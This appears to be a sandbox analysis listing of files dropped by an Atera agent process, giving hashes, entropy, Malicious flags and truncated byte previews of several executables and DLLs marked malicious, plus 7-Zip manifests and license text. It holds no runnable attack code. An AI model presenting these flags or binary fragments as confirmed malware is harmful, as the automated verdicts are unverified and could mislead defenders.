                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162895637606263
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:KMU90HpKOrGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:K59OpKgShcHUa
                                                                                                                                                                                                                                                                                              MD5:0BCC21AC34291B167EC4D73079EAE085
                                                                                                                                                                                                                                                                                              SHA1:BAEF2A7349E2C6269BBF2C8C6654C492683FC73E
                                                                                                                                                                                                                                                                                              SHA-256:14288199533B10CAD97F5917447979BBC4685F20255AA073EC1BB828D3CF6A2C
                                                                                                                                                                                                                                                                                              SHA-512:9B7CC423E4F27DFF6006425311A6CC39CBA9CB5D3D4966C81FDA21C5907A434B6A748A92B65229A01A65440D8BA2D87D9E8C99CE80E2062569232A10AE74F9BA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162623164553414
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:1w9mHpKZNGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:C9UpK7ShcHUa
                                                                                                                                                                                                                                                                                              MD5:55CC3EA23C5430BE7B5A75A52157DA18
                                                                                                                                                                                                                                                                                              SHA1:AB1D482F2B5E7E0DAD31EA18B78D5F8EA849B87D
                                                                                                                                                                                                                                                                                              SHA-256:BE0494DC91E38456E22692F3AB1891C56871FB82A83ADFDC58F8F890141ECEC9
                                                                                                                                                                                                                                                                                              SHA-512:C09E0476E2D1F69A878195A4026954C5D74C0B5318254A60ABC5909F00A60CCE86D49D29BBF1ECAE498BCE0C2FD2551EFEF0FE287DAB7EAD2FE573CCC833CF3E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162059784215363
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:YE9tHpKrvGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:795pK7ShcHUa
                                                                                                                                                                                                                                                                                              MD5:4E2DC776C653ADBEBCF5DB16AB53296E
                                                                                                                                                                                                                                                                                              SHA1:290457CFC7EC45A493CCEACD2CA24A47237494C1
                                                                                                                                                                                                                                                                                              SHA-256:2DCB2236BB84AE42F4395E72EC67A22CBE0E68ADA4F80FABD7141B5B3D4E7985
                                                                                                                                                                                                                                                                                              SHA-512:533B424AFD7E5BF831BB72164D91B663A2368D458A3EFFFF7062A15D1AB77585C087FA5A5471D3530CCF30309AC30C35EAA4A9168A350071A64E912E15012311
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162082250130723
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:GI9KHpKHDGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:l9QpKjShcHUa
                                                                                                                                                                                                                                                                                              MD5:76385C4CF0842546103EDD75662BDAD7
                                                                                                                                                                                                                                                                                              SHA1:BC42B5817E6BB3568CC6D7C0BD2B03E8B723024B
                                                                                                                                                                                                                                                                                              SHA-256:67EB4084D0BD361C42FFD7AF025167BAFCE8496A35CA6616945E0942386C6424
                                                                                                                                                                                                                                                                                              SHA-512:BAB9B5AE9B89697A7FA83D0D29A4DB0B777F126EEC8DF3BAE9B009AF9A0D556BB79BF2DCED1D26C7A8E900AC5AA7DDE07CEC334DA6418925F352554383F77EC2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.163276282537277
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:pS791HpKIqGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:pO9xpKbShcHUa
                                                                                                                                                                                                                                                                                              MD5:5C9628C46256D0F6B14DE2168CBED8CC
                                                                                                                                                                                                                                                                                              SHA1:B7284385B0076623B76EC3FB2398B5EE8F3B9F85
                                                                                                                                                                                                                                                                                              SHA-256:354C3758A1F9E5A39E7292E9CCA353F815358977B3CC9A704BCEAB257AC6C24C
                                                                                                                                                                                                                                                                                              SHA-512:84886CF1632EFA70D8023F99A663E809422DFCC1C566793EF52078551DA105BFF1B2F9D54E197D8CCE53C3C725226635D623D9D539B5BFD4C17C802286EFADB4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162239721051707
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:TR9vHpKmEGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:F9/pKvShcHUa
                                                                                                                                                                                                                                                                                              MD5:8783ED37D6871AE20E4A65A655788A7E
                                                                                                                                                                                                                                                                                              SHA1:C42F5B032CF27FFC36869C22D5BE0363AC2E5AF4
                                                                                                                                                                                                                                                                                              SHA-256:5AFEF49A1BB85ED16EE7EF08D9ED694F166A9500701728770E50E92978566C5B
                                                                                                                                                                                                                                                                                              SHA-512:1FE424147DBAD7978F0C856D152F3236685C52DBCA5DD6AB7A03E5D1B8A08566FDF4574C4704FBEDF286A4C13B354D771E25D1B725D55578C14E9EAB2D8F9898
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0$/b.................F...........d... ........@.. ....................................@..................................c..W.......P....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...P............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (408), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):408
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5051207941364915
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:tGiELiPT5vHUiELiP3XojINW39z1vOiELiPXJ11vfioVGwpo1:bdbRdpkvNdvJf67Z1
                                                                                                                                                                                                                                                                                              MD5:0D66B84267AEEB09DB32BF6E06F6E010
                                                                                                                                                                                                                                                                                              SHA1:A0EC6D6F0CDEE193DA3CADA3244B3A4BDD6A4BEF
                                                                                                                                                                                                                                                                                              SHA-256:15ED64B66A8ADD588FB33BD20B9339C8C9A6B8DEB53AD3281F8CF1D9A7A1F2A7
                                                                                                                                                                                                                                                                                              SHA-512:B710FA222A98DCAC049552E5A26FF6096CAC65CCD294F5A73837785A2FB07D8143D9953DBFF4F0779C39C452394C411E7CB7BAD4C92FE7D5417D4E7D41AE9D41
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:W3siTmFtZSI6IjctWmlwICAoeDY0KSIsIlRoaXJkUGFydHlOYW1lIjoiN3ppcC5pbnN0YWxsIn0seyJOYW1lIjoiR29vZ2xlIENocm9tZSIsIlRoaXJkUGFydHlOYW1lIjoiR29vZ2xlQ2hyb21lIn0seyJOYW1lIjoiSmF2YSA4IFVwZGF0ZSAzODEiLCJUaGlyZFBhcnR5TmFtZSI6ImpyZTgifSx7Ik5hbWUiOiJNaWNyb3NvZnQgRWRnZSIsIlRoaXJkUGFydHlOYW1lIjoibWljcm9zb2Z0LWVkZ2UifSx7Ik5hbWUiOiJNaWNyb3NvZnQgRWRnZSBXZWJWaWV3MiBSdW50aW1lIiwiVGhpcmRQYXJ0eU5hbWUiOiJtaWNyb3NvZnQtZWRnZSJ9XQ==
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1167872
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.603432444128302
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:Gxb5vMX35l5UVrIdhcMEKWnttf7eePboHvVxSfOtl:GxbSz5UVrIdhnW1Pc96Otl
                                                                                                                                                                                                                                                                                              MD5:0DCE103B0102ADEC3279797665B7A4AE
                                                                                                                                                                                                                                                                                              SHA1:C121392BAB6DBA8D04BEE89C6B526E8E67650CC8
                                                                                                                                                                                                                                                                                              SHA-256:3DB62076E5FCC897FF29DA47FE4029900A4AD696B395B6FA96ACFF1229444C1D
                                                                                                                                                                                                                                                                                              SHA-512:20F0F02097694579AC8794D56411FBE2D97C47D37794CB52AFDABC9956C0452E8A3BB273ED34E463F31927E29E7E41C0FDDB82FBBE688DD39C4113C00EC91BC9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l...(x.(x.(x.Gg.+x..d.!x.Gg.,x.Gg.*x..p..)x.(x.@x..p../x..^..x..^.*x.3.z..x....-x..~.)x..X.)x.Rich(x.........PE..L...`u.a...........!.........~.......>....................................................@.............................y.......d........{......................P.......................................................D............................text............................... ..`.rdata..............................@..@.data...............................@....sxdata......p......................@....rsrc....{.......|..................@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):513
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.971000586893018
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TMHdt43O5GgVNSSN/aN/2UjMNciq2xA5NEG:2dt4+GgBNCNFjMyisD
                                                                                                                                                                                                                                                                                              MD5:8F89387331C12B55EAA26E5188D9E2FF
                                                                                                                                                                                                                                                                                              SHA1:537FDD4F1018CE8D08A3D151AD07B55D96E94DD2
                                                                                                                                                                                                                                                                                              SHA-256:6B7368CE5E38F6E0EE03CA0A9D1A2322CC0AFC07E8DE9DCC94E156853EAE5033
                                                                                                                                                                                                                                                                                              SHA-512:04C10AE52F85D3A27D4B05B3D1427DDC2AFACCFE94ED228F8F6AE4447FD2465D102F2DD95CAF1B617F8C76CB4243716469D1DA3DAC3292854ACD4A63CE0FD239
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="7z" processorArchitecture="*" type="win32" />.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>..</assembly>..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):331776
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.512244761259412
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:J5lqo52kDzMYDJSi7+Ni2ER9Vh98+1PrEVhkQf0huIDaLOjm:JMqzBDJkk2ERvT8MPAf/O6
                                                                                                                                                                                                                                                                                              MD5:7187AE605F4DCE14BB23EA2623956335
                                                                                                                                                                                                                                                                                              SHA1:F7C1DF33B875C98F41DCDE24117D89D42D25B7CE
                                                                                                                                                                                                                                                                                              SHA-256:9E2631C19B243C28B0980607CED2540E9447B1166572483475547C1A9DD4AC0E
                                                                                                                                                                                                                                                                                              SHA-512:F64522E2FB6BB61884FE53C34E79B355EFB9EC33C02B2CD67D729AF7D763E7B3873A5C7CE6AC7BB4567E6BCF8C70CADBC66F511E8BB151AB05096A832032BC8F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L...`u.a.....................<......<.............@..........................p............@.....................................x.... .......................0...2......................................................(............................text...r........................... ..`.rdata..b...........................@..@.data....'..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...<...0...>..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):513
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.971000586893018
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TMHdt43O5GgVNSSN/aN/2UjMNciq2xA5NEG:2dt4+GgBNCNFjMyisD
                                                                                                                                                                                                                                                                                              MD5:8F89387331C12B55EAA26E5188D9E2FF
                                                                                                                                                                                                                                                                                              SHA1:537FDD4F1018CE8D08A3D151AD07B55D96E94DD2
                                                                                                                                                                                                                                                                                              SHA-256:6B7368CE5E38F6E0EE03CA0A9D1A2322CC0AFC07E8DE9DCC94E156853EAE5033
                                                                                                                                                                                                                                                                                              SHA-512:04C10AE52F85D3A27D4B05B3D1427DDC2AFACCFE94ED228F8F6AE4447FD2465D102F2DD95CAF1B617F8C76CB4243716469D1DA3DAC3292854ACD4A63CE0FD239
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="7z" processorArchitecture="*" type="win32" />.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>..</assembly>..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1927
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.78095675693374
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:aCpXZHRo7dL53iEu+byAHsv7g6z0zBZfNP3VyFA:dlq7XTu+xCz0NxxVwA
                                                                                                                                                                                                                                                                                              MD5:899A48828B85C4B0402EE7CF1F65B62B
                                                                                                                                                                                                                                                                                              SHA1:73BA604E5A4E4EA6FB4AD23B8ADF3982B2C82D10
                                                                                                                                                                                                                                                                                              SHA-256:20343526E04CE61EED2675282462E7080D305246F7807386621149C2025765D9
                                                                                                                                                                                                                                                                                              SHA-512:EFD02998961261FFA64332EA13876906D55A8BD8209BF94F922D97889DDF1181129B6A08E5747F1C0A07E69CFC3A05E86D18AFC3E06325B51598F52360881B1B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview: 7-Zip.. ~~~~~.. License for use and distribution.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.... 7-Zip Copyright (C) 1999-2016 Igor Pavlov..... Licenses for files are:.... 1) 7z.dll: GNU LGPL + unRAR restriction.. 2) All other files: GNU LGPL.... The GNU LGPL + unRAR restriction means that you must follow both .. GNU LGPL rules and unRAR restriction rules....... Note: .. You can use 7-Zip on any computer, including a computer in a commercial .. organization. You don't need to register or pay for 7-Zip....... GNU LGPL information.. --------------------.... This library is free software; you can redistribute it and/or.. modify it under the terms of the GNU Lesser General Public.. License as published by the Free Software Foundation; either.. version 2.1 of the License, or (at your option) any later version..... This library is distributed in the hope that it will be useful,.. but WITHOUT ANY WARRANTY; without even the implied warranty of.. MERCHANTABI
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):29184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.423222213276874
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:02aUriLtuRZFwdpyTmNSHSBLVogO6QlRSO/:1r0ARZF6NFVogjQlRv/
                                                                                                                                                                                                                                                                                              MD5:5CA71CBFF5A8DE7E5E30B6E94CD42069
                                                                                                                                                                                                                                                                                              SHA1:991701A32492D743430627CBFBD56D6884C32588
                                                                                                                                                                                                                                                                                              SHA-256:23FBD1EE66FCE6872E97B2FE84C409AB30A74FE8720B722BC6F8BAE6E7764C04
